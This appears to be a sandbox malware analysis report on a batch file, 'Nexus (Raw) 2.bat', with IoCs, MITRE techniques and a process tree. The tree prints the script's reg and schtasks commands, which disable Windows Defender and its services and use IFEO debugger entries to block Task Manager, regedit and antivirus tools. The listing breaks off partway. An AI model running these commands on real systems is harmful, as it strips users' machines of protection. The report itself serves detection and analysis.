3d2f0eb09549fabfc03d00aef6d6b3184fc302ff5f5ab5cefae7371a4164099b

Analysis

max time kernel
35s
max time network
36s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
14/09/2024, 11:18

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Nexus (Raw) 2.bat
Size

19KB
MD5

4afe85544f8fe4dd3e07cf2183a986d2
SHA1

b28ea0692b55ac256fc36e28e83b57f25c75a196
SHA256

3d2f0eb09549fabfc03d00aef6d6b3184fc302ff5f5ab5cefae7371a4164099b
SHA512

bb72c653cc3ca3febfbf5f8ef7ea9da9feb9e59be10c45e1162fd5354bc2f49a19fe14f960efa3ce667b7bc7f1f72446567d65dfab2412fca349944b35085d2b
SSDEEP

192:tRs4lHjXj+n00Bayj/YvMlvuQDioaEGaS7mQWK8Ba4+0wjyyWd2CctlQERM/tMwc:vOaxau

Score

10^/10

defense_evasion evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 12 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe

Modifies Windows Defender notification settings 3 TTPs 3 IoCs

evasion trojan

Windows Service

T1543.003

Modify Registry

T1112

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\windows\system32\drivers\etc\hosts.txt	cmd.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 49 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHAccount.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashUpd.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashQuick.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MedalWall.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MedalWall.exe\debugger = "MedalWall.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PatchUp.exe\debugger = "PatchUp.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\klpsm.exe\debugger = "klpsm.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360SkinView.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashQuick.exe\debugger = "ashQuick.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LiveUpdate360.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360TsLiveUpd.exe\debugger = "360TsLiveUpd.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSafeMain.exe\debugger = "QHSafeMain.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHFileSmasher.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BrowseringProtection.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FeedBack.exe\debugger = "FeedBack.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe\debugger = "mmc.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TraceClean.exe\debugger = "TraceClean.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwServ.exe\debugger = "afwServ.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LiveUpdate360.exe\debugger = "3LiveUpdate360.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHAccount.exe\debugger = "QHAccount.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HomeRouterMgr.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashUpd.exe\debugger = "ashUpd.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360DeskAna.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Central.exe\debugger = "360Central.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PromoUtil.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashUpd.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSafeScanner.exe\debugger = "QHSafeScanner.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360DeskAna64.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FeedBack.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HomeRouterMgr.exe\debugger = "HomeRouterMgr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSafeMain.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Central.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360DeskAna.exe\debugger = "360DeskAna.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360SkinView.exe\debugger = "360SkinView.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PatchUp.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PromoUtil.exe\debugger = "PromoUtil.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\debugger = "taskmgr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TraceClean.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHFileSmasher.exe\debugger = "QHFileSmasher.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\debugger = "regedit.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BrowseringProtection.exe\debugger = "BrowseringProtection.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSafeScanner.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwServ.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\klpsm.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360DeskAna64.exe\debugger = "360DeskAna64.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360TsLiveUpd.exe	reg.exe

Modifies Security services 2 TTPs 5 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

T1112

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4"	reg.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3056 wrote to memory of 3120	3056	cmd.exe	84
PID 3056 wrote to memory of 3120	3056	cmd.exe	84
PID 3056 wrote to memory of 4752	3056	cmd.exe	85
PID 3056 wrote to memory of 4752	3056	cmd.exe	85
PID 3056 wrote to memory of 3500	3056	cmd.exe	86
PID 3056 wrote to memory of 3500	3056	cmd.exe	86
PID 3056 wrote to memory of 2904	3056	cmd.exe	87
PID 3056 wrote to memory of 2904	3056	cmd.exe	87
PID 3056 wrote to memory of 1328	3056	cmd.exe	88
PID 3056 wrote to memory of 1328	3056	cmd.exe	88
PID 3056 wrote to memory of 1252	3056	cmd.exe	89
PID 3056 wrote to memory of 1252	3056	cmd.exe	89
PID 3056 wrote to memory of 1172	3056	cmd.exe	90
PID 3056 wrote to memory of 1172	3056	cmd.exe	90
PID 3056 wrote to memory of 1436	3056	cmd.exe	91
PID 3056 wrote to memory of 1436	3056	cmd.exe	91
PID 3056 wrote to memory of 3800	3056	cmd.exe	92
PID 3056 wrote to memory of 3800	3056	cmd.exe	92
PID 3056 wrote to memory of 4064	3056	cmd.exe	93
PID 3056 wrote to memory of 4064	3056	cmd.exe	93
PID 3056 wrote to memory of 536	3056	cmd.exe	94
PID 3056 wrote to memory of 536	3056	cmd.exe	94
PID 3056 wrote to memory of 3612	3056	cmd.exe	95
PID 3056 wrote to memory of 3612	3056	cmd.exe	95
PID 3056 wrote to memory of 3436	3056	cmd.exe	96
PID 3056 wrote to memory of 3436	3056	cmd.exe	96
PID 3056 wrote to memory of 3840	3056	cmd.exe	97
PID 3056 wrote to memory of 3840	3056	cmd.exe	97
PID 3056 wrote to memory of 1916	3056	cmd.exe	98
PID 3056 wrote to memory of 1916	3056	cmd.exe	98
PID 3056 wrote to memory of 2640	3056	cmd.exe	99
PID 3056 wrote to memory of 2640	3056	cmd.exe	99
PID 3056 wrote to memory of 2544	3056	cmd.exe	100
PID 3056 wrote to memory of 2544	3056	cmd.exe	100
PID 3056 wrote to memory of 4412	3056	cmd.exe	102
PID 3056 wrote to memory of 4412	3056	cmd.exe	102
PID 3056 wrote to memory of 4976	3056	cmd.exe	103
PID 3056 wrote to memory of 4976	3056	cmd.exe	103
PID 3056 wrote to memory of 4400	3056	cmd.exe	104
PID 3056 wrote to memory of 4400	3056	cmd.exe	104
PID 3056 wrote to memory of 876	3056	cmd.exe	105
PID 3056 wrote to memory of 876	3056	cmd.exe	105
PID 3056 wrote to memory of 448	3056	cmd.exe	106
PID 3056 wrote to memory of 448	3056	cmd.exe	106
PID 3056 wrote to memory of 1956	3056	cmd.exe	107
PID 3056 wrote to memory of 1956	3056	cmd.exe	107
PID 3056 wrote to memory of 4572	3056	cmd.exe	108
PID 3056 wrote to memory of 4572	3056	cmd.exe	108
PID 3056 wrote to memory of 2060	3056	cmd.exe	109
PID 3056 wrote to memory of 2060	3056	cmd.exe	109
PID 3056 wrote to memory of 4764	3056	cmd.exe	110
PID 3056 wrote to memory of 4764	3056	cmd.exe	110
PID 3056 wrote to memory of 1004	3056	cmd.exe	112
PID 3056 wrote to memory of 1004	3056	cmd.exe	112
PID 3056 wrote to memory of 3508	3056	cmd.exe	113
PID 3056 wrote to memory of 3508	3056	cmd.exe	113
PID 3056 wrote to memory of 1380	3056	cmd.exe	114
PID 3056 wrote to memory of 1380	3056	cmd.exe	114
PID 3056 wrote to memory of 1992	3056	cmd.exe	115
PID 3056 wrote to memory of 1992	3056	cmd.exe	115
PID 3056 wrote to memory of 4316	3056	cmd.exe	116
PID 3056 wrote to memory of 4316	3056	cmd.exe	116
PID 3056 wrote to memory of 3012	3056	cmd.exe	117
PID 3056 wrote to memory of 3012	3056	cmd.exe	117

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Nexus (Raw) 2.bat"
1⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
PID:3056
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
  2⤵
  PID:3120
- C:\Windows\system32\reg.exe
  reg add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:4752
- C:\Windows\system32\reg.exe
  reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:3500
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender notification settings
  PID:2904
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f
  2⤵
  PID:1328
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
  2⤵
  PID:1252
- C:\Windows\system32\reg.exe
  reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2⤵
  PID:1172
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f
  2⤵
  PID:1436
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:3800
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2⤵
  PID:4064
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f
  2⤵
  PID:536
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f
  2⤵
  PID:3612
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2⤵
  PID:3436
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:3840
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1916
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2640
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2544
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:4412
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:4976
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2⤵
  PID:4400
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2⤵
  PID:876
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2⤵
  PID:448
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
  2⤵
  PID:1956
- C:\Windows\system32\reg.exe
  reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:4572
- C:\Windows\system32\reg.exe
  reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:2060
- C:\Windows\system32\schtasks.exe
  schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2⤵
  PID:4764
- C:\Windows\system32\schtasks.exe
  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2⤵
  PID:1004
- C:\Windows\system32\schtasks.exe
  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2⤵
  PID:3508
- C:\Windows\system32\schtasks.exe
  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2⤵
  PID:1380
- C:\Windows\system32\schtasks.exe
  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2⤵
  PID:1992
- C:\Windows\system32\reg.exe
  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
  2⤵
  PID:4316
- C:\Windows\system32\reg.exe
  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
  2⤵
  PID:3012
- C:\Windows\system32\reg.exe
  reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:3776
- C:\Windows\system32\reg.exe
  reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:3740
- C:\Windows\system32\reg.exe
  reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:412
- C:\Windows\system32\reg.exe
  reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:1288
- C:\Windows\system32\reg.exe
  reg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:2260
- C:\Windows\system32\reg.exe
  reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:1448
- C:\Windows\system32\reg.exe
  reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:2836
- C:\Windows\system32\reg.exe
  reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:3952
- C:\Windows\system32\reg.exe
  reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies security service
  PID:3132
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /v debugger /t REG_SZ /d taskmgr.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:1100
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe" /v debugger /t REG_SZ /d mmc.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:1060
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe" /v debugger /t REG_SZ /d regedit.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:1000
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\klpsm.exe" /v debugger /t REG_SZ /d klpsm.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:1168
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Central.exe" /v debugger /t REG_SZ /d 360Central.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:1696
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360DeskAna.exe" /v debugger /t REG_SZ /d 360DeskAna.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:2684
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360DeskAna64.exe" /v debugger /t REG_SZ /d 360DeskAna64.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:3540
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360SkinView.exe" /v debugger /t REG_SZ /d 360SkinView.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:3924
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360TsLiveUpd.exe" /v debugger /t REG_SZ /d 360TsLiveUpd.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:4580
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BrowseringProtection.exe" /v debugger /t REG_SZ /d BrowseringProtection.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:4092
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FeedBack.exe" /v debugger /t REG_SZ /d FeedBack.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:2988
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HomeRouterMgr.exe" /v debugger /t REG_SZ /d HomeRouterMgr.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:2252
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LiveUpdate360.exe" /v debugger /t REG_SZ /d 3LiveUpdate360.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:816
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MedalWall.exe" /v debugger /t REG_SZ /d MedalWall.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:3328
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PatchUp.exe" /v debugger /t REG_SZ /d PatchUp.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:696
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PromoUtil.exe" /v debugger /t REG_SZ /d PromoUtil.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:2416
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSafeMain.exe" /v debugger /t REG_SZ /d QHSafeMain.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:2636
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHAccount.exe" /v debugger /t REG_SZ /d QHAccount.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:1148
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHFileSmasher.exe" /v debugger /t REG_SZ /d QHFileSmasher.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:3716
- C:\Windows\system32\reg.exe
